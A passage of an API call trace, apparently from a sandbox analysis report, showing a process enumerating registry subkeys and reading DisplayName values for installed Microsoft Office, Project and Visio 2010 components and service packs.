lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.625] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-006E-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.625] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.625] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.625] wcslen (_String="Microsoft Office Shared MUI (English) 2010") returned 0x2a [0047.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Shared MUI (English) 2010", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.625] strlen (_Str="{90140000-006E-0409-1000-0000000FF1CE}") returned 0x26 [0047.625] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.625] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x30, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-006E-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.625] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-006E-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.625] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.625] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.625] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.625] strlen (_Str="{90140000-006E-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}") returned 0x5f [0047.625] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.625] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x31, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-006E-0409-1000-0000000FF1CE}_Office14.VISIOR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.625] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-006E-0409-1000-0000000FF1CE}_Office14.VISIOR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.625] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.626] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.626] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.626] strlen (_Str="{90140000-006E-0409-1000-0000000FF1CE}_Office14.VISIOR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}") returned 0x5d [0047.626] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.626] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x32, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-00A1-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.626] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-00A1-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.626] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.626] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2626f90, lpcbData=0x59ffd3c*=0x58 | out: lpType=0x0, lpData=0x2626f90*=0x4d, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.626] wcslen (_String="Microsoft Office OneNote MUI (English) 2010") returned 0x2b [0047.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office OneNote MUI (English) 2010", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0047.626] strlen (_Str="{90140000-00A1-0409-1000-0000000FF1CE}") returned 0x26 [0047.626] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.626] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x33, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-00B4-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.626] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-00B4-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.626] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.626] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2626f90, lpcbData=0x59ffd3c*=0x58 | out: lpType=0x0, lpData=0x2626f90*=0x4d, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.626] wcslen (_String="Microsoft Office Project MUI (English) 2010") returned 0x2b [0047.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Project MUI (English) 2010", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0047.626] strlen (_Str="{90140000-00B4-0409-1000-0000000FF1CE}") returned 0x26 [0047.626] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.626] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x34, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-00B4-0409-1000-0000000FF1CE}_Office14.PRJPROR_{316A864B-0547-40CE-B136-B02B4D18BF09}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.626] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-00B4-0409-1000-0000000FF1CE}_Office14.PRJPROR_{316A864B-0547-40CE-B136-B02B4D18BF09}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.627] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.627] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2626f90, lpcbData=0x59ffd3c*=0x58 | out: lpType=0x0, lpData=0x2626f90*=0x4d, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.627] wcslen (_String="Microsoft Project 2010 Service Pack 1 (SP1)") returned 0x2b [0047.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Project 2010 Service Pack 1 (SP1)", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0047.627] strlen (_Str="{90140000-00B4-0409-1000-0000000FF1CE}_Office14.PRJPROR_{316A864B-0547-40CE-B136-B02B4D18BF09}") returned 0x5e [0047.627] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.627] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x35, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-00BA-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.627] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-00BA-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.627] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.627] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.627] wcslen (_String="Microsoft Office Groove MUI (English) 2010") returned 0x2a [0047.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Groove MUI (English) 2010", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.627] strlen (_Str="{90140000-00BA-0409-1000-0000000FF1CE}") returned 0x26 [0047.627] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.627] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x36, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0115-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.627] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0115-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.627] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x74) returned 0x0 [0047.627] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x74 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x74) returned 0x0 [0047.627] wcslen (_String="Microsoft Office Shared Setup Metadata MUI (English) 2010") returned 0x39 [0047.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Shared Setup Metadata MUI (English) 2010", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0047.627] strlen (_Str="{90140000-0115-0409-1000-0000000FF1CE}") returned 0x26 [0047.627] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.627] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x37, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0115-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.627] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0115-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.628] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.628] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.628] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.628] strlen (_Str="{90140000-0115-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}") returned 0x5f [0047.628] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.628] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x38, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0115-0409-1000-0000000FF1CE}_Office14.VISIOR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.628] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0115-0409-1000-0000000FF1CE}_Office14.VISIOR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.628] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.628] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.628] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.628] strlen (_Str="{90140000-0115-0409-1000-0000000FF1CE}_Office14.VISIOR_{516CA4A9-98E6-4F77-A863-CBD8487368E4}") returned 0x5d [0047.628] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.628] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x39, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0117-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.628] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0117-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.628] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x74) returned 0x0 [0047.628] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x74 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x74) returned 0x0 [0047.628] wcslen (_String="Microsoft Office Access Setup Metadata MUI (English) 2010") returned 0x39 [0047.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Access Setup Metadata MUI (English) 2010", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0047.628] strlen (_Str="{90140000-0117-0409-1000-0000000FF1CE}") returned 0x26 [0047.628] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.629] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3a, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{91140000-0011-0000-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.629] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{91140000-0011-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.629] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x50) returned 0x0 [0047.629] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x50 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x50) returned 0x0 [0047.629] wcslen (_String="Microsoft Office Professional Plus 2010") returned 0x27 [0047.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Professional Plus 2010", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0047.629] strlen (_Str="{91140000-0011-0000-1000-0000000FF1CE}") returned 0x26 [0047.629] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.629] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3b, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{91140000-003B-0000-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.629] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{91140000-003B-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.629] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.629] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.629] wcslen (_String="Microsoft Office Project Professional 2010") returned 0x2a [0047.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Project Professional 2010", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.629] strlen (_Str="{91140000-003B-0000-1000-0000000FF1CE}") returned 0x26 [0047.629] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.629] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3c, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{E6F88893-86F0-4CFB-B7E0-733575D1DEB4}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.629] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{E6F88893-86F0-4CFB-B7E0-733575D1DEB4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.629] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.629] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26270c8, lpcbData=0x59ffd3c*=0x58 | out: lpType=0x0, lpData=0x26270c8*=0x4d, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.629] wcslen (_String="Microsoft Project 2010 Service Pack 1 (SP1)") returned 0x2b [0047.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Project 2010 Service Pack 1 (SP1)", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0047.629] strlen (_Str="{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{E6F88893-86F0-4CFB-B7E0-733575D1DEB4}") returned 0x5e [0047.629] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.630] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3d, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{91140000-0057-0000-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.630] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{91140000-0057-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.630] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x38) returned 0x0 [0047.630] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x261ffa0, lpcbData=0x59ffd3c*=0x38 | out: lpType=0x0, lpData=0x261ffa0*=0x4d, lpcbData=0x59ffd3c*=0x38) returned 0x0 [0047.630] wcslen (_String="Microsoft Office Visio 2010") returned 0x1b [0047.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Visio 2010", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0047.630] strlen (_Str="{91140000-0057-0000-1000-0000000FF1CE}") returned 0x26 [0047.630] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.630] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3e, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{91140000-0057-0000-1000-0000000FF1CE}_Office14.VISIOR_{9081486B-B26D-42DB-8D31-81C525A9526A}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.630] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{91140000-0057-0000-1000-0000000FF1CE}_Office14.VISIOR_{9081486B-B26D-42DB-8D31-81C525A9526A}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.630] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.630] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x54 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.630] wcslen (_String="Microsoft Visio 2010 Service Pack 1 (SP1)") returned 0x29 [0047.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visio 2010 Service Pack 1 (SP1)", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0047.630] strlen 